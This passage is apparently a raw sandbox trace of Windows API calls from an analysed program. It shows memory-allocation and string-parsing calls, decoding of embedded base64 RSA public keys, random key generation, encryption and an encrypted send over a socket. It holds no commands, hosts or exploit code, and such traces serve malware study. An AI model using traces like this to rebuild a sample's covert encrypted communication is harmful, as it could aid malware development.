returned 0x3d80152 [0157.773] malloc (_Size=0xb) returned 0x3648cf8 [0157.773] free (_Block=0x0) [0157.773] malloc (_Size=0x40) returned 0x3e22548 [0157.773] free (_Block=0x0) [0157.773] free (_Block=0x0) [0157.774] memchr (_Buf=0x3d80153, _Val=32, _MaxCount=0x13) returned 0x3d80156 [0157.774] malloc (_Size=0x4) returned 0x3f4bfc8 [0157.774] free (_Block=0x0) [0157.774] free (_Block=0x0) [0157.774] memchr (_Buf=0x3d80157, _Val=32, _MaxCount=0xf) returned 0x3d8015d [0157.774] malloc (_Size=0x7) returned 0x3f4bf88 [0157.774] free (_Block=0x0) [0157.774] free (_Block=0x0) [0157.774] memchr (_Buf=0x3d8015e, _Val=32, _MaxCount=0x8) returned 0x0 [0157.774] malloc (_Size=0x9) returned 0x3648c80 [0157.774] free (_Block=0x0) [0157.774] free (_Block=0x0) [0157.774] free (_Block=0x3648cf8) [0157.774] free (_Block=0x3f4bfc8) [0157.774] free (_Block=0x3f4bf88) [0157.774] free (_Block=0x3648c80) [0157.774] free (_Block=0x3e22548) [0157.774] memchr (_Buf=0x3defb30, _Val=32, _MaxCount=0x40) returned 0x0 [0157.774] malloc (_Size=0x41) returned 0x3694050 [0157.774] free (_Block=0x0) [0157.774] malloc (_Size=0x40) returned 0x3e22080 [0157.774] free (_Block=0x0) [0157.775] free (_Block=0x0) [0157.775] free (_Block=0x3694050) [0157.775] free (_Block=0x3e22080) [0157.775] memchr (_Buf=0x3defb80, _Val=32, _MaxCount=0x40) returned 0x0 [0157.775] malloc (_Size=0x41) returned 0x3693f60 [0157.775] free (_Block=0x0) [0157.775] malloc (_Size=0x40) returned 0x3e22350 [0157.775] free (_Block=0x0) [0157.775] free (_Block=0x0) [0157.775] free (_Block=0x3693f60) [0157.775] free (_Block=0x3e22350) [0157.775] memchr (_Buf=0x3e226f8, _Val=32, _MaxCount=0x3c) returned 0x0 [0157.775] malloc (_Size=0x3d) returned 0x3e22740 [0157.775] free (_Block=0x0) [0157.775] malloc (_Size=0x40) returned 0x3e22668 [0157.775] free (_Block=0x0) [0157.775] free (_Block=0x0) [0157.775] free (_Block=0x3e22740) [0157.775] free (_Block=0x3e22668) [0157.775] memchr (_Buf=0x3d80288, _Val=32, _MaxCount=0x1c) returned 0x3d80290 [0157.776] malloc (_Size=0x9) returned 0x3648e30 [0157.776] free (_Block=0x0) [0157.776] malloc (_Size=0x40) returned 0x3e22740 [0157.776] free (_Block=0x0) [0157.776] free (_Block=0x0) [0157.776] memchr (_Buf=0x3d80291, _Val=32, _MaxCount=0x13) returned 0x3d80294 [0157.776] malloc (_Size=0x4) returned 0x3f4c008 [0157.776] free (_Block=0x0) [0157.776] free (_Block=0x0) [0157.776] memchr (_Buf=0x3d80295, _Val=32, _MaxCount=0xf) returned 0x3d8029b [0157.776] malloc (_Size=0x7) returned 0x3f4bf68 [0157.776] free (_Block=0x0) [0157.776] free (_Block=0x0) [0157.776] memchr (_Buf=0x3d8029c, _Val=32, _MaxCount=0x8) returned 0x0 [0157.776] malloc (_Size=0x9) returned 0x3648f08 [0157.776] free (_Block=0x0) [0157.776] free (_Block=0x0) [0157.776] free (_Block=0x3648e30) [0157.776] free (_Block=0x3f4c008) [0157.776] free (_Block=0x3f4bf68) [0157.776] free (_Block=0x3648f08) [0157.776] free (_Block=0x3e22740) [0157.777] memchr (_Buf=0x3648d58, _Val=32, _MaxCount=0xb) returned 0x0 [0157.777] malloc (_Size=0xc) returned 0x3648f38 [0157.777] free (_Block=0x0) [0157.777] malloc (_Size=0x40) returned 0x3e22668 [0157.777] free (_Block=0x0) [0157.777] free (_Block=0x0) [0157.777] free (_Block=0x3648f38) [0157.777] free (_Block=0x3e22668) [0157.777] memchr (_Buf=0x3d80120, _Val=32, _MaxCount=0x1e) returned 0x3d8012a [0157.777] malloc (_Size=0xb) returned 0x3648f08 [0157.777] free (_Block=0x0) [0157.777] malloc (_Size=0x40) returned 0x3e22230 [0157.777] free (_Block=0x0) [0157.777] free (_Block=0x0) [0157.777] memchr (_Buf=0x3d8012b, _Val=32, _MaxCount=0x13) returned 0x3d8012e [0157.777] malloc (_Size=0x4) returned 0x3f4bf98 [0157.777] free (_Block=0x0) [0157.777] free (_Block=0x0) [0157.777] memchr (_Buf=0x3d8012f, _Val=32, _MaxCount=0xf) returned 0x3d80135 [0157.777] malloc (_Size=0x7) returned 0x3f4bf78 [0157.777] free (_Block=0x0) [0157.778] free (_Block=0x0) [0157.778] memchr (_Buf=0x3d80136, _Val=32, _MaxCount=0x8) returned 0x0 [0157.778] malloc (_Size=0x9) returned 0x3648e30 [0157.778] free (_Block=0x0) [0157.778] free (_Block=0x0) [0157.778] free (_Block=0x3648f08) [0157.778] free (_Block=0x3f4bf98) [0157.778] free (_Block=0x3f4bf78) [0157.778] free (_Block=0x3648e30) [0157.778] free (_Block=0x3e22230) [0157.778] memchr (_Buf=0x3defbd0, _Val=32, _MaxCount=0x40) returned 0x0 [0157.778] malloc (_Size=0x41) returned 0x3693880 [0157.778] free (_Block=0x0) [0157.778] malloc (_Size=0x40) returned 0x3e221a0 [0157.778] free (_Block=0x0) [0157.778] free (_Block=0x0) [0157.778] free (_Block=0x3693880) [0157.778] free (_Block=0x3e221a0) [0157.778] memchr (_Buf=0x3defc70, _Val=32, _MaxCount=0x40) returned 0x0 [0157.778] malloc (_Size=0x41) returned 0x3693d30 [0157.778] free (_Block=0x0) [0157.778] malloc (_Size=0x40) returned 0x3e22590 [0157.779] free (_Block=0x0) [0157.779] free (_Block=0x0) [0157.779] free (_Block=0x3693d30) [0157.779] free (_Block=0x3e22590) [0157.779] memchr (_Buf=0x3e22620, _Val=32, _MaxCount=0x3c) returned 0x0 [0157.779] malloc (_Size=0x3d) returned 0x3e22350 [0157.779] free (_Block=0x0) [0157.779] malloc (_Size=0x40) returned 0x3e22590 [0157.779] free (_Block=0x0) [0157.779] free (_Block=0x0) [0157.779] free (_Block=0x3e22350) [0157.779] free (_Block=0x3e22590) [0157.779] memchr (_Buf=0x3d800a8, _Val=32, _MaxCount=0x1c) returned 0x3d800b0 [0157.779] malloc (_Size=0x9) returned 0x3648d70 [0157.779] free (_Block=0x0) [0157.779] malloc (_Size=0x40) returned 0x3e22668 [0157.779] free (_Block=0x0) [0157.779] free (_Block=0x0) [0157.779] memchr (_Buf=0x3d800b1, _Val=32, _MaxCount=0x13) returned 0x3d800b4 [0157.779] malloc (_Size=0x4) returned 0x3f4bf18 [0157.779] free (_Block=0x0) [0157.779] free (_Block=0x0) [0157.780] memchr (_Buf=0x3d800b5, _Val=32, _MaxCount=0xf) returned 0x3d800bb [0157.780] malloc (_Size=0x7) returned 0x3f4bf28 [0157.780] free (_Block=0x0) [0157.780] free (_Block=0x0) [0157.780] memchr (_Buf=0x3d800bc, _Val=32, _MaxCount=0x8) returned 0x0 [0157.780] malloc (_Size=0x9) returned 0x3648c98 [0157.780] free (_Block=0x0) [0157.780] free (_Block=0x0) [0157.780] CryptStringToBinaryA (in: pszString="MIGJAoGBAL9v/75bZHzkkCAnWu8kYgxSWfbrf8Omq2DoqEt/sVPaq9t6YjYPfYJ0TYjxinsaONBHTeXxd6qgaW6dFZs1R0CEd2aFRMTwEX4m3xyChFwfdNGcnUZKVMjqca7D5sHMBbW8GeLGfAQ7b8tr9rk0C9MNaz5XcvtgXJtSAt9ysjdVAgMBAAE=", cchString=0xbc, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x316f3b0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x316f3b0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0157.780] malloc (_Size=0x8c) returned 0x3d9e978 [0157.780] free (_Block=0x0) [0157.780] CryptStringToBinaryA (in: pszString="MIGJAoGBAL9v/75bZHzkkCAnWu8kYgxSWfbrf8Omq2DoqEt/sVPaq9t6YjYPfYJ0TYjxinsaONBHTeXxd6qgaW6dFZs1R0CEd2aFRMTwEX4m3xyChFwfdNGcnUZKVMjqca7D5sHMBbW8GeLGfAQ7b8tr9rk0C9MNaz5XcvtgXJtSAt9ysjdVAgMBAAE=", cchString=0xbc, dwFlags=0x6, pbBinary=0x3d9e978, pcbBinary=0x316f3b0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d9e978, pcbBinary=0x316f3b0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0157.780] malloc (_Size=0x8c) returned 0x3d9f130 [0157.780] free (_Block=0x0) [0157.780] free (_Block=0x3f6aea0) [0157.780] free (_Block=0x3d9e978) [0157.780] free (_Block=0x3648d70) [0157.780] free (_Block=0x3f4bf18) [0157.780] free (_Block=0x3f4bf28) [0157.781] free (_Block=0x3648c98) [0157.781] free (_Block=0x3e22668) [0157.781] memchr (_Buf=0x36245b0, _Val=32, _MaxCount=0x33) returned 0x36245c2 [0157.781] malloc (_Size=0x13) returned 0x3f65360 [0157.781] free (_Block=0x0) [0157.781] malloc (_Size=0x40) returned 0x3e223e0 [0157.781] free (_Block=0x0) [0157.781] free (_Block=0x0) [0157.781] memchr (_Buf=0x36245c3, _Val=32, _MaxCount=0x20) returned 0x0 [0157.781] malloc (_Size=0x21) returned 0x60de58 [0157.781] free (_Block=0x0) [0157.781] free (_Block=0x0) [0157.781] malloc (_Size=0x14) returned 0x3f653c0 [0157.781] free (_Block=0x0) [0157.781] malloc (_Size=0x14) returned 0x3f653e0 [0157.781] free (_Block=0x0) [0157.782] free (_Block=0x3f653e0) [0157.782] free (_Block=0x3f653c0) [0157.782] free (_Block=0x3f65360) [0157.782] free (_Block=0x60de58) [0157.782] free (_Block=0x3e223e0) [0157.782] memchr (_Buf=0x3d800d0, _Val=32, _MaxCount=0x1a) returned 0x3d800da [0157.782] malloc (_Size=0xb) returned 0x3648e90 [0157.782] free (_Block=0x0) [0157.782] malloc (_Size=0x40) returned 0x3e22080 [0157.783] free (_Block=0x0) [0157.783] free (_Block=0x0) [0157.783] memchr (_Buf=0x3d800db, _Val=32, _MaxCount=0xf) returned 0x0 [0157.783] malloc (_Size=0x10) returned 0x3648f38 [0157.783] free (_Block=0x0) [0157.783] free (_Block=0x0) [0157.783] free (_Block=0x3648e90) [0157.783] free (_Block=0x3648f38) [0157.783] free (_Block=0x3e22080) [0157.783] memchr (_Buf=0x3648f20, _Val=32, _MaxCount=0xf) returned 0x3648f2a [0157.783] malloc (_Size=0xb) returned 0x3648f38 [0157.783] free (_Block=0x0) [0157.783] malloc (_Size=0x40) returned 0x3e22788 [0157.783] free (_Block=0x0) [0157.783] free (_Block=0x0) [0157.783] memchr (_Buf=0x3648f2b, _Val=32, _MaxCount=0x4) returned 0x0 [0157.783] malloc (_Size=0x5) returned 0x3f4bf28 [0157.783] free (_Block=0x0) [0157.783] free (_Block=0x0) [0157.783] free (_Block=0x3648f38) [0157.783] free (_Block=0x3f4bf28) [0157.783] free (_Block=0x3e22788) [0157.784] memchr (_Buf=0x3648e60, _Val=32, _MaxCount=0x9) returned 0x0 [0157.784] malloc (_Size=0xa) returned 0x3648d70 [0157.784] free (_Block=0x0) [0157.784] malloc (_Size=0x40) returned 0x3e22230 [0157.784] free (_Block=0x0) [0157.784] free (_Block=0x0) [0157.784] free (_Block=0x3648d70) [0157.784] free (_Block=0x3e22230) [0157.784] memchr (_Buf=0x3d80350, _Val=32, _MaxCount=0x1e) returned 0x3d8035a [0157.784] malloc (_Size=0xb) returned 0x3648e30 [0157.784] free (_Block=0x0) [0157.784] malloc (_Size=0x40) returned 0x3e22350 [0157.784] free (_Block=0x0) [0157.784] free (_Block=0x0) [0157.784] memchr (_Buf=0x3d8035b, _Val=32, _MaxCount=0x13) returned 0x3d8035e [0157.784] malloc (_Size=0x4) returned 0x3f4bf18 [0157.784] free (_Block=0x0) [0157.784] free (_Block=0x0) [0157.784] memchr (_Buf=0x3d8035f, _Val=32, _MaxCount=0xf) returned 0x3d80365 [0157.784] malloc (_Size=0x7) returned 0x3f4c048 [0157.784] free (_Block=0x0) [0157.784] free (_Block=0x0) [0157.784] memchr (_Buf=0x3d80366, _Val=32, _MaxCount=0x8) returned 0x0 [0157.785] malloc (_Size=0x9) returned 0x3648c80 [0157.785] free (_Block=0x0) [0157.785] free (_Block=0x0) [0157.785] free (_Block=0x3648e30) [0157.785] free (_Block=0x3f4bf18) [0157.785] free (_Block=0x3f4c048) [0157.785] free (_Block=0x3648c80) [0157.785] free (_Block=0x3e22350) [0157.785] memchr (_Buf=0x3693920, _Val=32, _MaxCount=0x40) returned 0x0 [0157.785] malloc (_Size=0x41) returned 0x3694050 [0157.785] free (_Block=0x0) [0157.785] malloc (_Size=0x40) returned 0x3e22668 [0157.785] free (_Block=0x0) [0157.785] free (_Block=0x0) [0157.785] free (_Block=0x3694050) [0157.785] free (_Block=0x3e22668) [0157.785] memchr (_Buf=0x3694000, _Val=32, _MaxCount=0x40) returned 0x0 [0157.785] malloc (_Size=0x41) returned 0x3693e20 [0157.785] free (_Block=0x0) [0157.785] malloc (_Size=0x40) returned 0x3e22548 [0157.785] free (_Block=0x0) [0157.786] free (_Block=0x0) [0157.786] free (_Block=0x3693e20) [0157.786] free (_Block=0x3e22548) [0157.786] memchr (_Buf=0x3e221e8, _Val=32, _MaxCount=0x3c) returned 0x0 [0157.786] malloc (_Size=0x3d) returned 0x3e227d0 [0157.786] free (_Block=0x0) [0157.786] malloc (_Size=0x40) returned 0x3e22350 [0157.786] free (_Block=0x0) [0157.786] free (_Block=0x0) [0157.786] free (_Block=0x3e227d0) [0157.786] free (_Block=0x3e22350) [0157.786] memchr (_Buf=0x3d803c8, _Val=32, _MaxCount=0x1c) returned 0x3d803d0 [0157.786] malloc (_Size=0x9) returned 0x3648f08 [0157.786] free (_Block=0x0) [0157.786] malloc (_Size=0x40) returned 0x3e22668 [0157.786] free (_Block=0x0) [0157.786] free (_Block=0x0) [0157.786] memchr (_Buf=0x3d803d1, _Val=32, _MaxCount=0x13) returned 0x3d803d4 [0157.786] malloc (_Size=0x4) returned 0x3f4bf58 [0157.786] free (_Block=0x0) [0157.786] free (_Block=0x0) [0157.786] memchr (_Buf=0x3d803d5, _Val=32, _MaxCount=0xf) returned 0x3d803db [0157.786] malloc (_Size=0x7) returned 0x3f4c018 [0157.787] free (_Block=0x0) [0157.787] free (_Block=0x0) [0157.787] memchr (_Buf=0x3d803dc, _Val=32, _MaxCount=0x8) returned 0x0 [0157.787] malloc (_Size=0x9) returned 0x3648e90 [0157.787] free (_Block=0x0) [0157.787] free (_Block=0x0) [0157.787] free (_Block=0x3648f08) [0157.787] free (_Block=0x3f4bf58) [0157.787] free (_Block=0x3f4c018) [0157.787] free (_Block=0x3648e90) [0157.787] free (_Block=0x3e22668) [0157.787] memchr (_Buf=0x3648e18, _Val=32, _MaxCount=0xb) returned 0x0 [0157.787] malloc (_Size=0xc) returned 0x3648ed8 [0157.787] free (_Block=0x0) [0157.787] malloc (_Size=0x40) returned 0x3e22350 [0157.787] free (_Block=0x0) [0157.787] free (_Block=0x0) [0157.787] free (_Block=0x3648ed8) [0157.787] free (_Block=0x3e22350) [0157.788] memchr (_Buf=0x3694a18, _Val=32, _MaxCount=0x1e) returned 0x3694a22 [0157.788] malloc (_Size=0xb) returned 0x3648e90 [0157.788] free (_Block=0x0) [0157.788] malloc (_Size=0x40) returned 0x3e22080 [0157.788] free (_Block=0x0) [0157.788] free (_Block=0x0) [0157.788] memchr (_Buf=0x3694a23, _Val=32, _MaxCount=0x13) returned 0x3694a26 [0157.788] malloc (_Size=0x4) returned 0x3f4bfc8 [0157.788] free (_Block=0x0) [0157.788] free (_Block=0x0) [0157.788] memchr (_Buf=0x3694a27, _Val=32, _MaxCount=0xf) returned 0x3694a2d [0157.788] malloc (_Size=0x7) returned 0x3f4bf38 [0157.788] free (_Block=0x0) [0157.788] free (_Block=0x0) [0157.788] memchr (_Buf=0x3694a2e, _Val=32, _MaxCount=0x8) returned 0x0 [0157.788] malloc (_Size=0x9) returned 0x3648e30 [0157.788] free (_Block=0x0) [0157.788] free (_Block=0x0) [0157.788] free (_Block=0x3648e90) [0157.788] free (_Block=0x3f4bfc8) [0157.788] free (_Block=0x3f4bf38) [0157.789] free (_Block=0x3648e30) [0157.789] free (_Block=0x3e22080) [0157.789] memchr (_Buf=0x3693b00, _Val=32, _MaxCount=0x40) returned 0x0 [0157.789] malloc (_Size=0x41) returned 0x3694050 [0157.789] free (_Block=0x0) [0157.789] malloc (_Size=0x40) returned 0x3e220c8 [0157.789] free (_Block=0x0) [0157.789] free (_Block=0x0) [0157.789] free (_Block=0x3694050) [0157.789] free (_Block=0x3e220c8) [0157.789] memchr (_Buf=0x3693fb0, _Val=32, _MaxCount=0x40) returned 0x0 [0157.789] malloc (_Size=0x41) returned 0x3693e20 [0157.789] free (_Block=0x0) [0157.789] malloc (_Size=0x40) returned 0x3e22668 [0157.789] free (_Block=0x0) [0157.789] free (_Block=0x0) [0157.789] free (_Block=0x3693e20) [0157.789] free (_Block=0x3e22668) [0157.789] memchr (_Buf=0x3e226b0, _Val=32, _MaxCount=0x3c) returned 0x0 [0157.789] malloc (_Size=0x3d) returned 0x3e22590 [0157.789] free (_Block=0x0) [0157.790] malloc (_Size=0x40) returned 0x3e22350 [0157.790] free (_Block=0x0) [0157.790] free (_Block=0x0) [0157.790] free (_Block=0x3e22590) [0157.790] free (_Block=0x3e22350) [0157.790] memchr (_Buf=0x3694a68, _Val=32, _MaxCount=0x1c) returned 0x3694a70 [0157.790] malloc (_Size=0x9) returned 0x3648e30 [0157.790] free (_Block=0x0) [0157.790] malloc (_Size=0x40) returned 0x3e22428 [0157.790] free (_Block=0x0) [0157.790] free (_Block=0x0) [0157.790] memchr (_Buf=0x3694a71, _Val=32, _MaxCount=0x13) returned 0x3694a74 [0157.790] malloc (_Size=0x4) returned 0x3f4c0e8 [0157.790] free (_Block=0x0) [0157.790] free (_Block=0x0) [0157.790] memchr (_Buf=0x3694a75, _Val=32, _MaxCount=0xf) returned 0x3694a7b [0157.790] malloc (_Size=0x7) returned 0x3f4bf18 [0157.790] free (_Block=0x0) [0157.790] free (_Block=0x0) [0157.790] memchr (_Buf=0x3694a7c, _Val=32, _MaxCount=0x8) returned 0x0 [0157.790] malloc (_Size=0x9) returned 0x3648d70 [0157.791] free (_Block=0x0) [0157.791] free (_Block=0x0) [0157.791] CryptStringToBinaryA (in: pszString="MIGJAoGBAM15H7DaMR+TgyaE4SFgxMde0znxicOgMeW5kPAe8P7SwmGEvGQkiwjHJ54+gAqygkQpC5DMcHHiVucTSYvjcnxtP8gXNsR5j3f50GBOY/7EvPLvamyhvK2lnEGLJZuGQIQFP3EsX0H0/K2SpwchmacqmS8STH/gQEQSf5WN68DFAgMBAAE=", cchString=0xbc, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x316f3b0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x316f3b0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0157.791] malloc (_Size=0x8c) returned 0x3d9f000 [0157.791] free (_Block=0x0) [0157.791] CryptStringToBinaryA (in: pszString="MIGJAoGBAM15H7DaMR+TgyaE4SFgxMde0znxicOgMeW5kPAe8P7SwmGEvGQkiwjHJ54+gAqygkQpC5DMcHHiVucTSYvjcnxtP8gXNsR5j3f50GBOY/7EvPLvamyhvK2lnEGLJZuGQIQFP3EsX0H0/K2SpwchmacqmS8STH/gQEQSf5WN68DFAgMBAAE=", cchString=0xbc, dwFlags=0x6, pbBinary=0x3d9f000, pcbBinary=0x316f3b0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d9f000, pcbBinary=0x316f3b0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0157.791] malloc (_Size=0x8c) returned 0x3d9e848 [0157.791] free (_Block=0x0) [0157.791] free (_Block=0x3f6af38) [0157.791] free (_Block=0x3d9f000) [0157.791] free (_Block=0x3648e30) [0157.791] free (_Block=0x3f4c0e8) [0157.791] free (_Block=0x3f4bf18) [0157.791] free (_Block=0x3648d70) [0157.791] free (_Block=0x3e22428) [0157.791] free (_Block=0x3692200) [0157.791] free (_Block=0x3624030) [0157.791] free (_Block=0x3f65340) [0157.791] free (_Block=0x3648cc8) [0157.791] free (_Block=0x3648da0) [0157.791] free (_Block=0x3d802b0) [0157.792] free (_Block=0x3def9f0) [0157.792] free (_Block=0x3defa40) [0157.792] free (_Block=0x3e22278) [0157.792] free (_Block=0x3d801e8) [0157.792] free (_Block=0x3648ec0) [0157.792] free (_Block=0x3d80238) [0157.792] free (_Block=0x3defcc0) [0157.792] free (_Block=0x3defae0) [0157.792] free (_Block=0x3e22038) [0157.792] free (_Block=0x3d80260) [0157.792] free (_Block=0x3624470) [0157.792] free (_Block=0x3d803f0) [0157.792] free (_Block=0x3648db8) [0157.792] free (_Block=0x3648dd0) [0157.792] free (_Block=0x3d80148) [0157.792] free (_Block=0x3defb30) [0157.792] free (_Block=0x3defb80) [0157.792] free (_Block=0x3e226f8) [0157.792] free (_Block=0x3d80288) [0157.792] free (_Block=0x3648d58) [0157.792] free (_Block=0x3d80120) [0157.792] free (_Block=0x3defbd0) [0157.793] free (_Block=0x3defc70) [0157.793] free (_Block=0x3e22620) [0157.793] free (_Block=0x3d800a8) [0157.793] free (_Block=0x36245b0) [0157.793] free (_Block=0x3d800d0) [0157.793] free (_Block=0x3648f20) [0157.793] free (_Block=0x3648e60) [0157.793] free (_Block=0x3d80350) [0157.793] free (_Block=0x3693920) [0157.793] free (_Block=0x3694000) [0157.793] free (_Block=0x3e221e8) [0157.793] free (_Block=0x3d803c8) [0157.793] free (_Block=0x3648e18) [0157.793] free (_Block=0x3694a18) [0157.793] free (_Block=0x3693b00) [0157.793] free (_Block=0x3693fb0) [0157.793] free (_Block=0x3e226b0) [0157.793] free (_Block=0x3694a68) [0157.793] free (_Block=0x60d508) [0157.793] free (_Block=0x0) [0157.793] free (_Block=0x36929c0) [0157.793] free (_Block=0x60cdc0) [0157.793] free (_Block=0x3f69ce0) [0157.793] free (_Block=0x3e22308) [0157.794] free (_Block=0x3648d88) [0157.794] free (_Block=0x3648ea8) [0157.794] free (_Block=0x3d80080) [0157.794] free (_Block=0x60eb48) [0157.794] free (_Block=0x60ebe8) [0157.794] free (_Block=0x3e222c0) [0157.794] free (_Block=0x3d802d8) [0157.794] free (_Block=0x36249f8) [0157.794] free (_Block=0x60de88) [0157.794] free (_Block=0x3f65140) [0157.794] free (_Block=0x3f652c0) [0157.794] free (_Block=0x3f65440) [0157.794] free (_Block=0x60e878) [0157.794] free (_Block=0x60e8c8) [0157.794] free (_Block=0x60e918) [0157.794] free (_Block=0x60e788) [0157.794] free (_Block=0x60ea58) [0157.794] free (_Block=0x60eaa8) [0157.794] free (_Block=0x60eaf8) [0157.794] free (_Block=0x60ee18) [0157.794] free (_Block=0x60ecd8) [0157.794] free (_Block=0x60edc8) [0157.794] free (_Block=0x60eb98) [0157.795] free (_Block=0x60ee68) [0157.795] free (_Block=0x60e6e8) [0157.795] free (_Block=0x60e9b8) [0157.795] free (_Block=0x60e7d8) [0157.795] free (_Block=0x60e738) [0157.795] free (_Block=0x60ed28) [0157.795] free (_Block=0x60ec88) [0157.795] free (_Block=0x60e828) [0157.795] free (_Block=0x60ec38) [0157.795] free (_Block=0x60e968) [0157.795] free (_Block=0x60ed78) [0157.795] free (_Block=0x60ea08) [0157.795] free (_Block=0x3defef0) [0157.795] free (_Block=0x3deff90) [0157.795] free (_Block=0x3deff40) [0157.795] free (_Block=0x3defe00) [0157.795] free (_Block=0x3defd60) [0157.795] free (_Block=0x3defe50) [0157.795] free (_Block=0x3defdb0) [0157.795] free (_Block=0x3defc20) [0157.795] free (_Block=0x3deffe0) [0157.795] free (_Block=0x3defea0) [0157.795] free (_Block=0x3defa90) [0157.795] free (_Block=0x3df0030) [0157.796] free (_Block=0x3df0080) [0157.796] free (_Block=0x3defd10) [0157.796] free (_Block=0x3def900) [0157.796] free (_Block=0x3624a30) [0157.796] free (_Block=0x3f65280) [0157.796] free (_Block=0x3648de8) [0157.796] free (_Block=0x3d80198) [0157.796] free (_Block=0x3def950) [0157.796] free (_Block=0x3def9a0) [0157.796] free (_Block=0x3624838) [0157.796] free (_Block=0x3f65300) [0157.796] free (_Block=0x3def010) [0157.796] free (_Block=0x0) [0157.796] free (_Block=0x3f68010) [0157.796] free (_Block=0x36246f0) [0157.796] CloseHandle (hObject=0x5d4) returned 1 [0157.796] CloseHandle (hObject=0x5d0) returned 1 [0157.796] free (_Block=0x0) [0157.797] free (_Block=0x3d66630) [0157.797] malloc (_Size=0x202) returned 0x606108 [0157.797] free (_Block=0x0) [0157.797] EncryptMessage (in: phContext=0x3594d4c, fQOP=0x0, pMessage=0x316f41c, MessageSeqNo=0x0 | out: pMessage=0x316f41c) returned 0x0 [0157.797] send (s=0x5c8, buf=0x3de7008*, len=543, flags=0) returned 543 [0157.797] free (_Block=0x606108) [0157.798] free (_Block=0x0) [0157.798] CryptDestroyKey (hKey=0x3e1498) returned 1 [0157.799] free (_Block=0x3691270) [0157.799] CryptDestroyHash (hHash=0x3e1a18) returned 1 [0157.799] CryptDestroyHash (hHash=0x3e15d8) returned 1 [0157.799] CryptDestroyKey (hKey=0x3e1818) returned 1 [0157.799] CryptDestroyKey (hKey=0x3e1618) returned 1 [0157.799] free (_Block=0x3df0550) [0157.799] free (_Block=0x36241f0) [0157.799] CryptDestroyKey (hKey=0x3e1858) returned 1 [0157.801] free (_Block=0x36915b0) [0157.801] CryptDestroyHash (hHash=0x432c78) returned 1 [0157.801] CryptDestroyHash (hHash=0x432df8) returned 1 [0157.801] CryptDestroyKey (hKey=0x432a38) returned 1 [0157.801] CryptDestroyKey (hKey=0x432eb8) returned 1 [0157.802] free (_Block=0x36918f0) [0157.802] free (_Block=0x3624570) [0157.802] SetEvent (hEvent=0x380) returned 1 [0157.802] SetEvent (hEvent=0x5b0) returned 1 [0157.802] free (_Block=0x3648d10) [0157.802] free (_Block=0x3d80300) [0157.802] CloseHandle (hObject=0x5b0) returned 1 [0157.802] CloseHandle (hObject=0x380) returned 1 [0157.802] free (_Block=0x3d9ab98) [0157.802] malloc (_Size=0x50) returned 0x3d9ab40 [0157.802] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x380 [0157.802] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x5b0 [0157.802] SetEvent (hEvent=0x380) returned 1 [0157.802] malloc (_Size=0x34) returned 0x36241f0 [0157.802] malloc (_Size=0x338) returned 0x3691270 [0157.803] malloc (_Size=0x80) returned 0x6098b8 [0157.803] free (_Block=0x0) [0157.803] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x80, pbBuffer=0x6098b8 | out: pbBuffer=0x6098b8) returned 1 [0157.803] CryptImportKey (in: hProv=0x3e57b0, pbData=0x316f178, dwDataLen=0x190, hPubKey=0x0, dwFlags=0x1, phKey=0x316f174 | out: phKey=0x316f174*=0x432af8) returned 1 [0157.839] CryptExportKey (in: hKey=0x432af8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x316edd4, pdwDataLen=0x316edbc | out: pbData=0x316edd4*, pdwDataLen=0x316edbc*=0x90) returned 1 [0157.839] free (_Block=0x6098b8) [0157.839] malloc (_Size=0x10) returned 0x3648cf8 [0157.839] free (_Block=0x0) [0157.839] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x10, pbBuffer=0x3648cf8 | out: pbBuffer=0x3648cf8) returned 1 [0157.839] malloc (_Size=0x40) returned 0x3e22038 [0157.839] free (_Block=0x0) [0157.839] malloc (_Size=0x104) returned 0x3df0550 [0157.839] free (_Block=0x3e22038) [0157.839] CryptDecodeObject (in: dwCertEncodingType=0x1, lpszStructType=0x13, pbEncoded=0x605a18, cbEncoded=0x8c, dwFlags=0x0, pvStructInfo=0x316f374, pcbStructInfo=0x316f34c | out: pvStructInfo=0x316f374, pcbStructInfo=0x316f34c) returned 1 [0157.839] CryptImportKey (in: hProv=0x3cf450, pbData=0x316f374, dwDataLen=0x94, hPubKey=0x0, dwFlags=0x1, phKey=0x316f370 | out: phKey=0x316f370*=0x432bb8) returned 1 [0157.839] malloc (_Size=0x80) returned 0x60a3e0 [0157.839] free (_Block=0x0) [0157.839] CryptEncrypt (in: hKey=0x432bb8, hHash=0x0, Final=1, dwFlags=0x40, pbData=0x60a3e0*, pdwDataLen=0x316f340*=0x56, dwBufLen=0x80 | out: pbData=0x60a3e0*, pdwDataLen=0x316f340*=0x80) returned 1 [0157.840] CryptDestroyKey (hKey=0x432bb8) returned 1 [0157.840] CryptImportKey (in: hProv=0x3cf450, pbData=0x316f410, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x316f40c | out: phKey=0x316f40c*=0x432db8) returned 1 [0157.840] CryptSetKeyParam (hKey=0x432db8, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0157.840] malloc (_Size=0x3a) returned 0x3e224b8 [0157.840] free (_Block=0x0) [0157.840] CryptEncrypt (in: hKey=0x432db8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f320*, pdwDataLen=0x316f284*=0x10, dwBufLen=0x10 | out: pbData=0x316f320*, pdwDataLen=0x316f284*=0x10) returned 1 [0157.840] CryptEncrypt (in: hKey=0x432db8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f320*, pdwDataLen=0x316f284*=0x10, dwBufLen=0x10 | out: pbData=0x316f320*, pdwDataLen=0x316f284*=0x10) returned 1 [0157.840] CryptEncrypt (in: hKey=0x432db8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f320*, 